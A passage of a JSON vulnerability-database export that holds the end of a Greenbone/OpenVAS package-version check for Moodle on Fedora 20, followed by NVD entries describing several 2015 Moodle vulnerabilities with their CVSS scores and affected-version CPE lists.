the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869172\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-06 07:13:30 +0200 (Mon, 06 Apr 2015)\");\n script_cve_id(\"CVE-2014-3541\", \"CVE-2014-3542\", \"CVE-2014-3543\", \"CVE-2014-3544\",\n \"CVE-2014-3545\", \"CVE-2014-3546\", \"CVE-2014-3547\", \"CVE-2014-3548\",\n \"CVE-2014-3549\", \"CVE-2014-3550\", \"CVE-2014-3551\", \"CVE-2014-3552\",\n \"CVE-2014-3553\", \"CVE-2014-0213\", \"CVE-2014-0214\", \"CVE-2014-0215\",\n \"CVE-2014-0216\", \"CVE-2014-0217\", \"CVE-2014-0218\", \"CVE-2014-0122\",\n \"CVE-2014-0123\", \"CVE-2014-0124\", \"CVE-2014-0125\", \"CVE-2014-0126\",\n \"CVE-2014-0127\", \"CVE-2014-0129\", \"CVE-2014-0008\", \"CVE-2015-2269\",\n \"CVE-2015-2268\", \"CVE-2015-2267\", \"CVE-2015-2266\", \"CVE-2015-2272\",\n \"CVE-2015-2273\", \"CVE-2015-2270\", \"CVE-2015-2271\", \"CVE-2015-1493\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for moodle FEDORA-2015-4530\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moodle'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"moodle on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-4530\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154251.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"moodle\", rpm:\"moodle~2.6.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T20:03:02", "description": "Cross-site scripting (XSS) vulnerability in mod/quiz/report/statistics/statistics_question_table.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to inject arbitrary web script or HTML by leveraging the student role for a crafted quiz response.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2273", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2273"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2273", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:02", "description": "login/token.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to bypass a forced-password-change requirement by creating a web-services token.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2272", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2272"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2272", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:02", "description": "mdeploy.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to bypass intended access restrictions and extract archives to arbitrary directories via a crafted dataroot value.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2267", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2267"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2267", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2267", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:02", "description": "Multiple cross-site scripting (XSS) vulnerabilities in lib/javascript-static.js in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allow remote authenticated users to inject arbitrary web script or HTML via a (1) alt or (2) title attribute in an IMG element.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2269", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2269"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2269", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2269", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:02", "description": "tag/user.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 does not consider the moodle/tag:flag capability before proceeding with a flaginappropriate action, which allows remote authenticated users to bypass intended access restrictions via the \"Flag as inappropriate\" feature.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2271", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2271"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2271", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:02", "description": "filter/urltolink/filter.php in Moodle through 2.5.9, 2.6.x before 2.6.9, 2.7.x before 2.7.6, and 2.8.x before 2.8.4 allows remote authenticated users to cause a denial of service (CPU consumption or partial outage) via a crafted string that is matched against an improper regular expression.", "edition": 6, "cvss3": {}, "published": "2015-06-01T19:59:00", "title": "CVE-2015-2268", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2268"], "modified": "2020-12-01T14:54:00", "cpe": ["cpe:/a:moodle:moodle:2.6.4", "cpe:/a:moodle:moodle:2.6.2", "cpe:/a:moodle:moodle:2.7.2", "cpe:/a:moodle:moodle:2.5.6", "cpe:/a:moodle:moodle:2.8.3", "cpe:/a:moodle:moodle:2.8.2", "cpe:/a:moodle:moodle:2.7.0", "cpe:/a:moodle:moodle:2.6.5", "cpe:/a:moodle:moodle:2.5.7", "cpe:/a:moodle:moodle:2.7.1", "cpe:/a:moodle:moodle:2.8.0", "cpe:/a:moodle:moodle:2.6.6", "cpe:/a:moodle:moodle:2.5.5", "cpe:/a:moodle:moodle:2.5.0", "cpe:/a:moodle:moodle:2.5.8", "cpe:/a:moodle:moodle:2.5.2", "cpe:/a:moodle:moodle:2.6.0", "cpe:/a:moodle:moodle:2.6.3", "cpe:/a:moodle:moodle:2.7.5", "cpe:/a:moodle:moodle:2.5.4", "cpe:/a:moodle:moodle:2.5.9", "cpe:/a:moodle:moodle:2.5.3", "cpe:/a:moodle:moodle:2.7.4", "cpe:/a:moodle:moodle:2.5.1", "cpe:/a:moodle:moodle:2.8.1", "cpe:/a:moodle:moodle:2.6.8", "cpe:/a:moodle:moodle:2.6.7", "cpe:/a:moodle:moodle:2.7.3", "cpe:/a:moodle:moodle:2.6.1"], "id": "CVE-2015-2268", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2268", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*", 